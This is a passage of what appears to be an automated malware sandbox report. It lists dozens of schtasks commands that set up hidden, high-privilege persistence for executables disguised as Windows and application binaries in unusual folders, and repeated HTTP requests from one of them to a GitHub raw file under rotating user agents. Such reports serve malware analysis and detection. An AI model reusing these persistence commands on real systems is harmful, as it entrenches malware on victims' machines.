                                                          schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:436
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4484
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4852
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files\VideoLAN\VLC\Registry.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4524
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\Registry.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2548
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\VideoLAN\VLC\Registry.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4620
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\DllCommonsvc.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:1804
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Users\Default User\DllCommonsvc.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4352
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\DllCommonsvc.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4340
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Windows\Logs\WindowsUpdate\StartMenuExperienceHost.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3152
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\Logs\WindowsUpdate\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2224
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Windows\Logs\WindowsUpdate\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3652
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\spoolsv.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:1084
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\spoolsv.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4032
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\spoolsv.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2644
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\providercommon\OfficeClickToRun.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2812
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\providercommon\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3056
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\providercommon\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4468
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\locale\SearchApp.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4372
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\locale\SearchApp.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3656
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\locale\SearchApp.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3968
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\apppatch\de-DE\csrss.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2988
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\apppatch\de-DE\csrss.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:5068
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\apppatch\de-DE\csrss.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2628
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\SppExtComObj.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:5020
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\SppExtComObj.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4092
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\SppExtComObj.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3268
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\sysmon.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2144
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Windows\Installer\sysmon.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2340
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Windows\Installer\sysmon.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3544
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\sihost.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4872
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3064
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:1848
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\System.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4364
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3044
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3240
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\unsecapp.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2012
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:1400
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2520
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Start Menu\upfc.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4356
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\Admin\Start Menu\upfc.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2004
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Start Menu\upfc.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:1260

                                                        Network

                                                        • flag-us
                                                          DNS
                                                          8.8.8.8.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          8.8.8.8.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                          8.8.8.8.in-addr.arpa
                                                          IN PTR
                                                          dnsgoogle
                                                        • flag-us
                                                          DNS
                                                          217.106.137.52.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          217.106.137.52.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          DNS
                                                          172.214.232.199.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          172.214.232.199.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          DNS
                                                          95.221.229.192.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          95.221.229.192.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          DNS
                                                          69.31.126.40.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          69.31.126.40.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          DNS
                                                          raw.githubusercontent.com
                                                          TextInputHost.exe
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          raw.githubusercontent.com
                                                          IN A
                                                          Response
                                                          raw.githubusercontent.com
                                                          IN A
                                                          185.199.109.133
                                                          raw.githubusercontent.com
                                                          IN A
                                                          185.199.110.133
                                                          raw.githubusercontent.com
                                                          IN A
                                                          185.199.108.133
                                                          raw.githubusercontent.com
                                                          IN A
                                                          185.199.111.133
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:16:56 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600083-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 0
                                                          X-Timer: S1734805017.865423,VS0,VE80
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: c1da420f4daf39f452d0ca7f53dee2c0bc647a10
                                                          Expires: Sat, 21 Dec 2024 18:21:56 GMT
                                                          Source-Age: 0
                                                        • flag-us
                                                          DNS
                                                          133.109.199.185.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          133.109.199.185.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                          133.109.199.185.in-addr.arpa
                                                          IN PTR
                                                          cdn-185-199-109-133githubcom
                                                        • flag-us
                                                          DNS
                                                          149.220.183.52.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          149.220.183.52.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:17:08 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600068-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805029.889645,VS0,VE1
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 2f906ca90f594347ac89dbbc910798799589e52d
                                                          Expires: Sat, 21 Dec 2024 18:22:08 GMT
                                                          Source-Age: 12
                                                        • flag-us
                                                          DNS
                                                          56.163.245.4.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          56.163.245.4.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          DNS
                                                          198.187.3.20.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          198.187.3.20.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          DNS
                                                          172.210.232.199.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
                                                          Request
                                                          172.210.232.199.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:17:19 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lon420122-LON
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805039.895952,VS0,VE129
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 715e81ce4ed3ecaca224bd60522c13d9f17d03bf
                                                          Expires: Sat, 21 Dec 2024 18:22:19 GMT
                                                          Source-Age: 0
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:17:29 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lon420117-LON
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805050.594273,VS0,VE1
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 4398bf8808f7137ac04fee82f9e9fb9193fe0202
                                                          Expires: Sat, 21 Dec 2024 18:22:29 GMT
                                                          Source-Age: 11
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:17:40 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600049-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805060.184720,VS0,VE2
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 86acef99d6f2480c647a2ddb5c18dfe4e39d083e
                                                          Expires: Sat, 21 Dec 2024 18:22:40 GMT
                                                          Source-Age: 43
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:17:54 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600073-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805074.427115,VS0,VE2
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 0a84a28504198e112c9143880f3c074a6c46dcff
                                                          Expires: Sat, 21 Dec 2024 18:22:54 GMT
                                                          Source-Age: 57
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:18:00 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lon4251-LON
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805081.946373,VS0,VE1
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 5de2d00f4700c190280748a2a82dbfc917ea08e3
                                                          Expires: Sat, 21 Dec 2024 18:23:00 GMT
                                                          Source-Age: 42
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:18:07 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lon420118-LON
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805088.692534,VS0,VE1
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 9b8c4eac93e40a00b065a5c52dad21a8043f1da6
                                                          Expires: Sat, 21 Dec 2024 18:23:07 GMT
                                                          Source-Age: 49
                                                        • flag-us
                                                          DNS
                                                          48.229.111.52.in-addr.arpa
                                                          Remote address:
                                                          8.8.8.8:53
